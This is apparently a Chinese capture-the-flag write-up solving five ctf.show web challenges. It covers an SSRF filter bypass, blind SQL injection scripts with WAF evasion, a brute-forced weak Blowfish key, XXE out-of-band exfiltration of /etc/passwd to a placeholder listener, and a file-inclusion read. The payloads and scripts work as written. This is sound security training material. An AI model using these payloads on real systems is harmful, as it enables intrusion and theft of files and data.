web1_观字

<?php

#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
    $url = $_GET['url'];
    $protocol = substr($url, 0,7);
    if($protocol!='http://'){
        die('仅限http协议访问');
    }
    if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
        die('仅限域名地址访问');
    }
    system('curl '.$url);
}

?url=http://192。168。7。68/flag

SSRF常见的URL绕过方式

1、“@”符号绕过
http://www.baidu.com@10.10.10.10与http://10.10.10.10请求是相同的。

2、点分割符号替换
在浏览器中可以使用不同的分割符号来代替域名中的.分割，可以使用。、｡、．来代替：

3、本地回环地址

4、IP的进制转换
由于IP地址可以用多种格式表示，因此可以在URL中如下所示使用：
点分十进制IP地址：http://216.58.199.78
八进制IP地址：http://0330.0072.0307.0116（将每个十进制数字转换为八进制）
十六进制IP地址：http://0xD83AC74E或者http://0xD8.0x3A.0xC7.0x4E（将每个十进制数字转换为十六进制）
整数或DWORD IP地址：http://3627730766（将十六进制IP转换为整数）

5、短网址

web2_观星

先跑下敏感词拦截情况，拦截的关键词还挺多

用%09绕过空格的waf，这里还拦截了ASCII等盲注常用词

-1%09or%091%23     -1	or	1#
回显出所有的文章

平时的二分法的SQL盲注语句为

?stunum=(ascii(substr((select(group_concat(table_name))from('\
'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)

^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='web1'),{},1))>{})^1".format(i,mid)

fzuu一下，依次绕过waf代替如下

ORD()函数返回字符串中第一个字符的ASCII值

0		%09
3	ascii	ord
16	= like	rlike regexp
17	’	0x十六进制
19	,	from for
21	"	0x十六进制

脚本如下

import requests
url = 'http://47320b32-c69e-453b-9618-096398f13ac8.challenge.ctf.show/index.php?id=1'
res = ''
for i in range(1, 50):
    high = 128
    low = 32
    mid = (high+low)//2
    while high > low:
        # payload = "^(ord(substr((database())from({})for(1)))>{})^1".format(i, mid)
        # payload = "^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)in(database()))from({})for(1)))>{})^1".format(i,mid)
        # payload = "^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)in(0x666c6167))from({})for(1)))>{})^1".format(i,mid)
        payload = "^(ord(substr((select(group_concat(flag))from(web1.flag))from({})for(1)))>{})^1".format(i,mid)
        s = requests.get(url=url+payload)
        if 'Kipling' in s.text:
            low = mid+1
        else:
            high = mid
        mid = (high+low)//2
    # print(mid)
    res += chr(mid)
    print(res)

网上的脚本（非二分）

import requests

baseurl='http://426c70b1-b58c-4b5e-8e2d-abf5bde77c46.chall.ctf.show/index.php?id=1^'
value=""
for i in range(1,50):
    print("i=" + str(i))
    for j in range(38,128):
        # paylaod='case(ord(substr(database()from({})for(1))))when({})then(2)else(3)end'.format(i,j)
        #paylaod='case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({})for(1))))when({})then(2)else(3)end'.format(i,j)
        # paylaod='case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({})for(1))))when({})then(2)else(3)end'.format(i,j)
        paylaod='case(ord(substr((select(flag)from(flag))from({})for(1))))when({})then(2)else(3)end'.format(i,j)
        # "case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(2)else(3)end".format(i, j)
        newurl=baseurl+paylaod
        rep=requests.get(newurl).text
        # print(rep)
        if "I asked nothing" in rep:
            print(value)
            value+=chr(j)
            break

web3_观图

showImage.php?image=Z6Ilu83MIDw=
在某些平台下（例如 Windows）RAND_MAX 只有32768

<?php

//$key = substr(md5('ctfshow'.rand()),3,8);
//flag in config.php
include('config.php');
if(isset($_GET['image'])){
    $image=$_GET['image'];
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(file_exists($str)){
        header('content-type:image/gif');
        echo file_get_contents($str);
    }
}else{
    highlight_file(__FILE__);
}
?>

<?php
$image="Z6Ilu83MIDw=";
for($i=0;$i<40000;$i++)
{
    $key = substr(md5('ctfshow' . $i), 3, 8);
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(strpos($str,'jpg')|strpos($str,'png')|strpos($str,'gif'))
    {
        echo $i.PHP_EOL;
        echo $key.PHP_EOL;
        echo $str;
    break;
    }
}
?>

27347
5a78dbb4
1.jpg

<?php
$image="config.php";
    $key = "5a78dbb4";
    $str = openssl_encrypt($image, 'bf-ecb', $key);
    echo $str;
?>

?image=N6bf8Bd8jm0SpmTZGl0isw==

web4_观心

<!-- flag in filesystem /flag.txt -->

POST /api.php HTTP/1.1
Host: f3fcabf4-3e41-4da7-a0cf-0d5f8262a36e.challenge.ctf.show
Content-Length: 74
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://f3fcabf4-3e41-4da7-a0cf-0d5f8262a36e.challenge.ctf.show
Referer: http://f3fcabf4-3e41-4da7-a0cf-0d5f8262a36e.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

api=http://flash.weather.com.cn/wmaps/xml/city.xml&city=Fuzhou

发现api.php

Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name does not resolve in /var/www/html/api.php on line 16

Warning: file_get_contents(http://flash.weather.com.cn/wmaps/xml/fuzhou.xml): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name does not resolve in /var/www/html/api.php on line 16

Warning: DOMDocument::loadXML(): Empty string supplied as input in /var/www/html/api.php on line 20

Warning: simplexml_import_dom(): Invalid Nodetype to import in /var/www/html/api.php on line 21

Fatal error: Uncaught Error: Call to a member function children() on null in /var/www/html/api.php:28 Stack trace: #0 {main} thrown in /var/www/html/api.php on line 28

文档类型定义（DTD）可定义合法的XML文档构建模块，它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML文档中（内部引用），也可作为一个外部引用。

DTD文档中有很多重要的关键字如下：

• DOCTYPE（DTD的声明）
• ENTITY（实体的声明）
• SYSTEM、PUBLIC（外部资源申请）

可以用如下语法引入外部DTD

<!DOCTYPE 根元素 SYSTEM "文件名">

解析一个xml文件，这里考虑xxe外带文件内容

test.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip:6666?p=%file;'>">

a.xml
<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

监听相应端口，成功将passwd外带出来，同理修改为/flag.txt即可

签到_观己

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match('/php/i', $file)){
        die('error');
    }else{
        include($file);
    }

}else{
    highlight_file(__FILE__);
}

?>

简单的文件包含题目，过滤了php关键字

GET /?file=file:///flag.txt